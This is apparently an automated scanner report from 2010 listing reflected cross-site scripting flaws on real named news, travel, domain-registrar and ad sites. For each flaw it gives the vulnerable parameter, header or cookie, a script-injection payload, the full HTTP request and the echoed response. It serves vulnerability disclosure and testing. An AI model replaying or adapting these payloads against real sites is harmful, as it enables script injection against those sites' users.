The value of the t request parameter is copied into the HTML document as plain text between tags. The payload a036d<script>alert(1)</script>226d850a15 was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4589'%3b3d000edd68f was submitted in the REST URL parameter 3. This input was echoed as e4589';3d000edd68f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /article/20101114/NEWSe4589'%3b3d000edd68f/101119731/0/business HTTP/1.1 Host: www.pressdemocrat.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Cache-Control: max-age=0, s-maxage=0 Content-Length: 62585 Content-Type: text/html; charset=iso-8859-1 Expires: Mon, 15 Nov 2010 00:58:41 GMT Last-Modified: Mon, 15 Nov 2010 00:58:41 GMT Server: Microsoft-IIS/7.0 Set-Cookie: PBCSPERMUSERID=473409061121241; path=/; expires=Mon, 14 Nov 2011 16:58:41 GMT Set-Cookie: PBCSSESSIONID=473409061121241; path=/ X-Passed-To: S260608AT1VW029, URL Rewrite on site N/A (2010-11-14 19:58:41:225) X-Handled-By: S260608AT1VW029, Rewrite on site N/A X-Actual-URL: S260608AT1VW029, (/apps/pbcs.dll/article?AID=/20101114/NEWSe4589'%3b3d000edd68f/101119731/0/business) X-Passed-To-DLL: S260608AT1VW029, (2010-11-14 19:58:41:241) X-Passed-To-BeforeDispatch: S260608AT1VW029, on site SR (2010-11-14 19:58:41:241) X-Returned-From-BeforeDispatch: S260608AT1VW029, on site SR (2010-11-14 19:58:41:459) X-Passed-To-PostProcessResponse: S260608AT1VW029, on site SR (2010-11-14 19:58:53:678) X-Returned-From-PostProcessResponse: S260608AT1VW029, on site SR (2010-11-14 19:58:53:693) X-Returned-From-DLL: S260608AT1VW029 (2010-11-14 19:58:53:693) X-Returned-From: S260608AT1VW029(2010-11-14 19:58:53:693) Date: Mon, 15 Nov 2010 00:58:53 GMT X-Cache: MISS from nysquid01 X-Cache-Lookup: MISS from nysquid01:80 Via: 1.0 nysquid01 (squid/3.0.STABLE18) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
The ar ...[SNIP]... <script type="text/javascript"> function grabUrlOutBrain() { var category = 'NEWSe4589';3d000edd68f'; var url = ''; if (category == 'COMMUNITY') { url = 'http://www.petaluma360.com'; } else { url = 'http://www.pressdemocrat.com'; } // Builds url ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1270'%3bcaf06659bd4 was submitted in the REST URL parameter 4. This input was echoed as c1270';caf06659bd4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /article/20101114/NEWS/c1270'%3bcaf06659bd4/0/business?Title=Juggler-with-replica-grenade-causes-stir-at-Fisherman-s-Wharf HTTP/1.1 Host: www.pressdemocrat.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Cache-Control: max-age=0, s-maxage=0 Content-Length: 61011 Content-Type: text/html; charset=iso-8859-1 Expires: Mon, 15 Nov 2010 01:15:44 GMT Last-Modified: Mon, 15 Nov 2010 01:15:44 GMT Server: Microsoft-IIS/7.0 Set-Cookie: PBCSPERMUSERID=1073409062144085; path=/; expires=Mon, 14 Nov 2011 17:15:44 GMT Set-Cookie: PBCSSESSIONID=1073409062144085; path=/ X-Passed-To: S260608AT1VW025, URL Rewrite on site N/A (2010-11-14 20:15:44:070) X-Handled-By: S260608AT1VW025, Rewrite on site N/A X-Actual-URL: S260608AT1VW025, (/apps/pbcs.dll/article?AID=/20101114/NEWS/c1270'%3bcaf06659bd4/0/business&Title=Juggler-with-replica-grenade-causes-stir-at-Fisherman-s-Wharf) X-Passed-To-DLL: S260608AT1VW025, (2010-11-14 20:15:44:070) X-Passed-To-BeforeDispatch: S260608AT1VW025, on site SR (2010-11-14 20:15:44:070) X-Returned-From-BeforeDispatch: S260608AT1VW025, on site SR (2010-11-14 20:15:44:367) X-Passed-To-PostProcessResponse: S260608AT1VW025, on site SR (2010-11-14 20:15:48:570) X-Returned-From-PostProcessResponse: S260608AT1VW025, on site SR (2010-11-14 20:15:48:570) X-Returned-From-DLL: S260608AT1VW025 (2010-11-14 20:15:48:570) X-Returned-From: S260608AT1VW025(2010-11-14 20:15:48:570) Date: Mon, 15 Nov 2010 01:15:48 GMT X-Cache: MISS from nysquid01 X-Cache-Lookup: MISS from nysquid01:80 Via: 1.0 nysquid01 (squid/3.0.STABLE18) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
The ar ...[SNIP]...
} else { url = 'http://www.pressdemocrat.com'; } // Builds url to be passed to Outbrain sans the querystring parameters. SW var strUrl = url + '/article/20101114/NEWS/c1270';caf06659bd4/0/'; return strUrl; //document.write(strUrl); } var OB_permalink= grabUrlOutBrain(); var OB_langJS ='http://widgets.outbrain.com/lang_en.js'; var OB_Template = "nytrmg"; var OB_ ...[SNIP]...
The value of the type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f38c"><script>alert(1)</script>f1115e3a769 was submitted in the type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cgi-bin/article.cgi?f=/c/a/2010/11/13/DDGM1GB7GD.DTL&type=music8f38c"><script>alert(1)</script>f1115e3a769 HTTP/1.1 Host: www.sfgate.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 00:35:49 GMT Server: Apache/2.2.16 (Linux/SUSE) DAV/2 mod_fcgid/2.3.5 mod_perl/2.0.4 Perl/v5.12.1 Set-Cookie: Apache=174.122.23.218.1289781349498136; path=/; max-age=31536000; domain=.sfgate.com Content-Length: 114236 Vary: Accept-Encoding Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:pas="http://contribute.sfgate ...[SNIP]... <a href="/cgi-bin/object/article?f=/c/a/2010/11/13/DDGM1GB7GD.DTL&object=%2Fc%2Fpictures%2F2010%2F11%2F12%2Fdd-symph13_ph_0502549497.jpg&type=music8f38c"><script>alert(1)</script>f1115e3a769"> ...[SNIP]...
The value of the partner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87a76"%3balert(1)//81f3d367913 was submitted in the partner parameter. This input was echoed as 87a76";alert(1)//81f3d367913 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-control: private Content-Type: text/html Date: Mon, 15 Nov 2010 01:58:28 GMT P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa OUR BUS IND ONL UNI COM NAV STA PRE",policyref="/w3c/p3p.xml" Server: Microsoft-IIS/6.0 Content-Length: 2118 Connection: keep-alive
The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ebf5"%3balert(1)//9c1affca30c was submitted in the url parameter. This input was echoed as 7ebf5";alert(1)//9c1affca30c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-control: private Content-Type: text/html Date: Mon, 15 Nov 2010 01:58:29 GMT P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa OUR BUS IND ONL UNI COM NAV STA PRE",policyref="/w3c/p3p.xml" Server: Microsoft-IIS/6.0 Content-Length: 2118 Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/2.5.2/build/reset ...[SNIP]... (function () { Map.init("http://cdn-tiles.sigalert.com/9/Blue", 0, "", false); }); YAHOO.util.Event.on("idPortletViewport", "click", function () { Map.fullReport("http://www.mercurynews.com/traffic7ebf5";alert(1)//9c1affca30c"); }); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7c50"><script>alert(1)</script>331e8b91ab4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /travel-blog-entriese7c50"><script>alert(1)</script>331e8b91ab4/chris-roisin/1/1285183839/tpod.html HTTP/1.1 Host: www.travelpod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 01:58:56 GMT Server: Apache Content-language: " Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 7578
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b892f"><script>alert(1)</script>17dc6b007a8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /travel-blog-entries/chris-roisinb892f"><script>alert(1)</script>17dc6b007a8/1/1285183839/tpod.html HTTP/1.1 Host: www.travelpod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 01:58:56 GMT Server: Apache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 8478
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 //EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Page Not Found</tit ...[SNIP]... <a href="http://www.travelpod.ca/travel-blog-entries/chris-roisinb892f"><script>alert(1)</script>17dc6b007a8/1/1285183839/tpod.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2abe5"><script>alert(1)</script>df6448af980 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /travel-blog-entries/chris-roisin/12abe5"><script>alert(1)</script>df6448af980/1285183839/tpod.html HTTP/1.1 Host: www.travelpod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 01:58:57 GMT Server: Apache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 8478
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 //EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Page Not Found</tit ...[SNIP]... <a href="http://www.travelpod.ca/travel-blog-entries/chris-roisin/12abe5"><script>alert(1)</script>df6448af980/1285183839/tpod.html"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78b5e"><script>alert(1)</script>445c8b06197 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /travel-blog-entries/chris-roisin/1/1285183839/tpod.html78b5e"><script>alert(1)</script>445c8b06197 HTTP/1.1 Host: www.travelpod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 01:58:58 GMT Server: Apache Content-language: " Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 7578
3.312. http://www.travelpod.com/travel-blog-entries/chris-roisin/1/1285183839/tpod.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a96f"><script>alert(1)</script>c36d7607742 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /travel-blog-entries/chris-roisin/1/1285183839/tpod.html?3a96f"><script>alert(1)</script>c36d7607742=1 HTTP/1.1 Host: www.travelpod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 01:58:54 GMT Server: Apache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 89558
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 //EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:v="urn:schemas-microsoft-com:vm ...[SNIP]... <a href="http://www.travelpod.ca/travel-blog-entries/chris-roisin/1/1285183839/tpod.html?3a96f"><script>alert(1)</script>c36d7607742=1"> ...[SNIP]...
The value of the _h request parameter is copied into the HTML document as plain text between tags. The payload bb70a<script>alert(1)</script>95663d9a58e was submitted in the _h parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the _h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f34d0"><script>alert(1)</script>f83d2ed9994 was submitted in the _h parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the _w request parameter is copied into the HTML document as plain text between tags. The payload f6db3<script>alert(1)</script>51af5c2ec60 was submitted in the _w parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the _w request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e926"><script>alert(1)</script>9660dc5851c was submitted in the _w parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the affid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de77c'%3balert(1)//b315e82560b was submitted in the affid parameter. This input was echoed as de77c';alert(1)//b315e82560b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the paidid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94eca'%3balert(1)//5fb0354ea8d was submitted in the paidid parameter. This input was echoed as 94eca';alert(1)//5fb0354ea8d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the swt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 168e7"><script>alert(1)</script>85fa758f10a was submitted in the swt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 522b6'%3b4141e71064b was submitted in the REST URL parameter 1. This input was echoed as 522b6';4141e71064b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55fde'%3bd472d2014cb was submitted in the REST URL parameter 2. This input was echoed as 55fde';d472d2014cb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into an HTML comment. The payload ce6d2--><script>alert(1)</script>3d207f3b4af was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET / HTTP/1.1 Host: auctions.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=ce6d2--><script>alert(1)</script>3d207f3b4af
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 14 Nov 2010 23:12:37 GMT Server: Microsoft-IIS/6.0 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=pqs1un552xpzc455nlgueir0; path=/; HttpOnly Set-Cookie: traffic=cookies=1&referrer=http://www.google.com/search?hl=en&q=ce6d2--><script>alert(1)</script>3d207f3b4af&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=DNAWEB03&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.122.23.218&referringpath=; domain=godaddy.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 210398
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd407"><script>alert(1)</script>715bb58c7ce was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=bd407"><script>alert(1)</script>715bb58c7ce
Response
HTTP/1.1 200 OK Date: Sun, 14 Nov 2010 23:22:20 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 88675
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=bd407"><script>alert(1)</script>715bb58c7ce" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload faa99<script>alert(1)</script>175acf5c8e3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=faa99<script>alert(1)</script>175acf5c8e3
Response
HTTP/1.1 200 OK Date: Sun, 14 Nov 2010 23:22:21 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 88661
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <h4>faa99<script>alert(1)</script>175acf5c8e3 - Google search</h4> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a73bf"><script>alert(1)</script>211ed40a6e1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: www.radiogodaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=a73bf"><script>alert(1)</script>211ed40a6e1
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Mon, 15 Nov 2010 00:30:33 GMT Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND" X-Powered-By: ASP.NET Content-Length: 73243 Content-Type: text/html Expires: Mon, 08 Nov 2010 01:50:33 GMT Set-Cookie: currency1=potableSourceStr=USD; expires=Mon, 14-Nov-2011 07:00:00 GMT; domain=.radiogodaddy.com; path=/ Set-Cookie: adc1=US; expires=Sun, 21-Nov-2010 07:00:00 GMT; domain=.radiogodaddy.com; path=/ Set-Cookie: serverVersion=A; domain=.radiogodaddy.com; path=/ Set-Cookie: domainYardVal=%2D1; domain=.radiogodaddy.com; path=/ Set-Cookie: ASPSESSIONIDACQDQCBA=EPLLNOCALPGJDPOEDAEIAJCI; path=/ Cache-control: no-cache
<script language="javascript"> var imagesURL = "https://imagesak.securepaynet.net/"; var secPrefix = "http"; </script> <script language="javascript"> function openDemoVideo(mediaID, ...[SNIP]... <img src="http://img.godaddy.com/image.aspx?sitename=www.radiogodaddy.com&server=CORPWEB169&page=/gdshop/live/default.asp&referrer=http://www.google.com/search?hl=en&q=a73bf"><script>alert(1)</script>211ed40a6e1&shopper=&privatelabelid=1&isc=&clientip=174.122.23.218&status=200 OK&referringpath=&client_path=&querystring=show%3D267" border="0" width="0" height="0"> ...[SNIP]...
The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f88a'%3balert(1)//b39c6e64e0a was submitted in the cli cookie. This input was echoed as 4f88a';alert(1)//b39c6e64e0a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the cli cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd39f"%3balert(1)//f374c9d01b6 was submitted in the cli cookie. This input was echoed as fd39f";alert(1)//f374c9d01b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sun, 14 Nov 2010 23:03:12 GMT Connection: close Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Sun, 21-Nov-2010 23:03:12 GMT Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Mon, 15-Nov-2010 07:03:12 GMT Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Mon, 15-Nov-2010 23:03:12 GMT Content-Length: 7685
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... ttp://tags.bluekai.com/site/2731");CollectiveMedia.addPixel("http://pixel.quantserve.com/seg/r;a=p-86ZJnSph3DaTI;rand=563589045;redirect=http://a.collective-media.net/datapair?net=qc&id=11c4bc59fd87e17fd39f";alert(1)//f374c9d01b6&segs=!qcsegs&op=add");
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5837b<script>alert(1)</script>2765fadb63d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" x-ysws-error-detail: not_in_objectstore Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Server: YTS/1.17.23.1 Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex5837b<script>alert(1)</script>2765fadb63d/mediastore/062730bb-1899-481b-a0a5-5d453b885c3c?noredirect=1 x-ysws-request-id: 7902381d-c315-4b53-864a-7f7d3f51b6e7 Date: Mon, 15 Nov 2010 02:47:07 GMT Connection: close Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex5837b<script>alert(1)</script>2765fadb63d/mediastore/062730bb-1899-481b-a0a5-5d453b885c3c</p>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 74a41<script>alert(1)</script>8dd34fb94e2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
